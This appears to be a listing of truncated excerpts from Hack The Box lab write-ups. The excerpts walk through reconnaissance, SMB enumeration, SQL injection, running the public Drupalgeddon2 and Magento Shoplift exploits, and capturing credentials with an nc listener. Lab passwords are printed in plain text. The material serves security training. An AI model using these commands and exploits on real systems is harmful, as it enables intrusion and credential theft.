$ nmap -v -Pn 10.129.251.21 We can see, that box has SMB enabled on port 445.SMB stand for Server message block. $ smbclient -L 10.129.251.21 if we don’t add a -U parameter, the smbclient request will be performed using the current user. So, the only user we currently know that the box will contain is the Administrator, so we can use it. $ smbclient -L 10.129.251.21 -U Administrator $ smbclient

We continue with another very easy HTB box. $ nmap -p- 10.129.243.77 -sV –min-rate 5000 Here we have a Jetty Jetty 9.4.39.v20210325 Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. https://www.eclipse.org/jetty/ If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F This is a Jenkins server. Leading open source automation server, Jenkins provides hundreds of plugins

This is another of the HTB Starting Point’s very easy boxes. $ nmap -v -p- -sV 10.129.237.207 –min-rate 5000 Access to http://10.129.237.207/ According to the Nmap scan, the site runs under node.jsWappalyzer describes the Web Framework as Express. There is no email address control checking of the input: In fact, it seems that any input is reflected in the result. If we check for Server-Side Template Injection: The template engine

This is another of the Very easy HTB Starting Point boxes. $ sudo nano /etc/hosts $ nmap -p- -A 10.129.232.211 -sV Access to http://ignition.htb/ $ dirsearch -u http://ignition.htb -i 200 Access to http://ignition.htb/admin/ Based on HTB questions, the username is admin. As there is a form_key parameter it’s most difficult to brute-force.So, we can try then to guess manually the password using the most usual passwords. We can find more

This is one of the starting point HTB boxes.It is rated as a very easy and only have 1 flag. $ nmap -p- -A 10.129.216.146 –min-rate 5000 So, we are facing a Redis v5.0.7 instance. According to its site: Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets,

$ nmap -v -p- -A 10.10.10.233 –min-rate 5000 Site inspection: http://10.10.10.233/ $ whatweb http://10.10.10.233 We are facing a Drupal 7 CMS. $ dirsearch -u http://10.10.10.233/ -i 200 http://10.10.10.233/includes/bootstrap.inc Specifically, it is a Drupal v7.56. Let’s see if this Drupal version has some vulnerability. CVE-2018-7600https://github.com/dreadlocked/Drupalgeddon2 $ git clone https://github.com/dreadlocked/Drupalgeddon2.git$ ruby drupalgeddon2.rb http://10.10.10.233 armageddon.htb>> whoami armageddon.htb>> pwd armageddon.htb>> ls /var/www/html/sites -la armageddon.htb>> ls /var/www/html/sites/default -la armageddon.htb>> cat /var/www/html/sites/default/settings.php Mysql password = CQHEy@9M*m23gBVj

$ nmap -sV -p- goodgames.htb –min-rate 5000 http://goodgames.htb/ We can test if this site is vulnerable to an SQL Injection. If we just add a ‘, we can reach the login page with a registration form. http://internal-administration.goodgames.htb/ We don’t have credentials for this site, but as we’ve confirmed there is an sql injection let’s try to exploit it. First, we need to know how many columns exist. email=admin%40test.com’ union all

$ nmap -p- -sV 10.10.10.140 $sudo nano /etc/hosts Access to http://swagshop.htb/ As we are facing a Magento, we can use Magescan to check it. $ wget https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar $ php magescan.phar scan:all http://swagshop.htb From the magescan report, if we find about patches, the first one is SUPEE-5344. https://magento.com/security/patches/supee-5344-%E2%80%93-shoplift-bug-patchhttps://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.htmlhttps://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py With this poc, you should be able to add an admin user. $ python3 poc.py swagshop.htb Access to http://swagshop.htb/index.php/admin The “Froghopper” Attack After

$ nmap -sV -p- 10.10.11.108 -Pn –min-rate 5000 http://10.10.11.108/ http://10.10.11.108/settings.php If we add our IP into the Server Address field: $ sudo nc -lvnp 389 We get a connection and the svc-printer password. svc-printer:1edFg43012!! You can read more about this technique here. According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)